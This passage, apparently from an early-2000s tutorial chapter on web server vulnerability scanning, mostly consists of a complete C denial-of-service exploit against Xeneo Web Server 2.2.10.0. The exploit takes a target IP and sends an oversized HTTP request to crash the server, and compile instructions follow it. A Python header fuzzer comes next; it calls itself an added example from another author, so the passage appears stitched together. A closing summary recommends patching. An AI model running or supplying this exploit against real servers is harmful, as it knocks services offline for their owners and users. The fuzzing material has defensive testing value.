"Connection: Keep-Alive\r\n"
"Cookie: VARIABLE=SPLABS; path=/\r\n"
"User-Agent: Mozilla/4.76 [en] (X11; U; Linux 2.4.2-2 i686)\r\n"
"Variable: result\r\n"
"Host: localhost\r\n"
"Content-length: 513\r\n"
"Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png\r\n"
"Accept-Encoding: gzip\r\n"
"Accept-Language: en\r\n"
"Accept-Charset: iso-8859-1,*,utf-8\r\n\r\n\r\n"
"whatyoutyped=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n";

int main(int argc, char *argv[])
{
    WSADATA wsaData;
    WORD wVersionRequested;
    struct hostent *pTarget;
    struct sockaddr_in sock;
    char *target;
    int port;
    SOCKET mysocket;

    if (argc < 2)
    {
        printf("Xeneo Web Server 2.2.10.0 DoS\r\n <tommy@security-protocols.com>\r\n\r\n");
        printf("Tool Usage:\r\n %s <targetip> [targetport] (default is 80)\r\n\r\n", argv[0]);
        printf("www.security-protocols.com\r\n\r\n");
        exit(1);
    }

    wVersionRequested = MAKEWORD(1, 1);
    if (WSAStartup(wVersionRequested, &wsaData) != 0) return -1;

    target = argv[1];

    /* default web port */
    port = 80;
    if (argc >= 3) port = atoi(argv[2]);

    mysocket = socket(AF_INET, SOCK_STREAM, 0);
    if (mysocket == INVALID_SOCKET)
    {
        printf("Socket error!\r\n");
        exit(1);
    }

    printf("Resolving Hostnames...\n");
    if ((pTarget = gethostbyname(target)) == NULL)
    {
        printf("Resolve of %s failed\n", argv[1]);
        exit(1);
    }

    memset(&sock, 0, sizeof(sock));
    memcpy(&sock.sin_addr.s_addr, pTarget->h_addr, pTarget->h_length);
    sock.sin_family = AF_INET;
    sock.sin_port = htons((USHORT)port);

    printf("Connecting...\n");
    if (connect(mysocket, (struct sockaddr *)&sock, sizeof(sock)) != 0)
    {
        printf("Couldn't connect to host.\n");
        exit(1);
    }

    printf("Connected!...\n");
    printf("Sending Payload...\n");
    /* sizeof(exploit) - 1 leaves out the terminating NUL */
    if (send(mysocket, exploit, (int)(sizeof(exploit) - 1), 0) == SOCKET_ERROR)
    {
        printf("Error Sending the Exploit Payload\r\n");
        closesocket(mysocket);
        exit(1);
    }

    printf("Remote Webserver has been DoS'ed\r\n");
    closesocket(mysocket);
    WSACleanup();
    return 0;
}

You can compile this exploit with Microsoft Visual Studio 6.0.
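The SPIKE run above boils down to a simple loop: take a known-good request, stretch one field at a time, and notice when the server stops answering. As an added example (my own code, not SPIKE's and not from the page), here is that loop in Python: a case generator built from a template modelled on the request above, plus a sender that reports whether the server still answers. The header set, the fuzz strings and the path are assumptions; nothing is sent unless you call run_fuzz against a host you are allowed to test.

```python
import socket

# Template modelled on the request SPIKE produced above; every header value is a slot.
BASE_HEADERS = [
    ("Referer", "http://localhost/"),
    ("Cookie", "VARIABLE=SPLABS; path=/"),
    ("User-Agent", "Mozilla/4.76 [en] (X11; U; Linux 2.4.2-2 i686)"),
    ("Host", "localhost"),
]
# Classic stress strings: long runs of format/percent characters, long plain runs,
# format-string specifiers and traversal sequences (constructed, not SPIKE's lists).
FUZZ_STRINGS = ["%" * 400, "A" * 513, "%n" * 200, "../" * 100]


def build_request(headers, body=b""):
    """Serialise one HTTP/1.1 GET with the given headers and an honest Content-length."""
    lines = ["GET /index.html?testvariable=&nexttestvariable=gif HTTP/1.1"]
    lines += ["%s: %s" % kv for kv in headers]
    lines.append("Content-length: %d" % len(body))
    return ("\r\n".join(lines) + "\r\n\r\n").encode("latin-1") + body


def fuzz_cases(headers=BASE_HEADERS, strings=FUZZ_STRINGS):
    """Yield (description, request): every header slot gets every fuzz string, one at a time,
    then the body gets each string. Mutating one slot per case keeps a crash attributable."""
    for i, (name, value) in enumerate(headers):
        for s in strings:
            mutated = list(headers)
            mutated[i] = (name, value + s)
            yield ("%s += %d bytes" % (name, len(s)), build_request(mutated))
    for s in strings:
        body = ("whatyoutyped=" + s).encode("latin-1")
        yield ("body %d bytes" % len(body), build_request(headers, body))


def send_case(host, port, request, timeout=5.0):
    """True if the server answered with at least one byte, False if it dropped us or timed out."""
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            s.sendall(request)
            return bool(s.recv(1))
    except OSError:
        return False


def run_fuzz(host, port):
    """Send every case in order; return the description of the first case after which
    the server stopped answering, or None if it survived them all."""
    for desc, request in fuzz_cases():
        if not send_case(host, port, request):
            return desc
    return None


if __name__ == "__main__":
    for desc, request in fuzz_cases():
        print("%-24s %5d bytes" % (desc, len(request)))
```

A server that stops answering after case N may have died on case N or on an earlier one that only corrupted state, so confirm by restarting it and replaying the single suspect request, exactly as the C program above replays SPIKE's request. With a debugger attached to the server process you see the faulting instruction rather than just the silence.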

Summary

In this chapter we have covered a number of ways to scan for and find vulnerabilities in web servers and web applications. It is important to apply vendor security patches promptly, disable unneeded features on the web server, and regularly scan your own network for vulnerabilities.


References


Security Sites

http://security-protocols.com
http://eEye.com
http://packetstormsecurity.nl
http://astalavista.com

Scanning Tools

Nikto                    http://www.cirt.net/code/nikto.shtml
Whisker                  http://www.wiretrip.net/rfp/
Shadow Security Scanner  http://www.safety-lab.com

Fuzzing Tools

SPIKE                    http://www.immunitysec.com/spike.html


badpack3t
badpack3t@security-protocols.com
www.security-protocols.com

Copyright © 2000-2003 Security-Protocols Inc. All trademarks are property of their respective owners and are used here for entertainment purposes only.
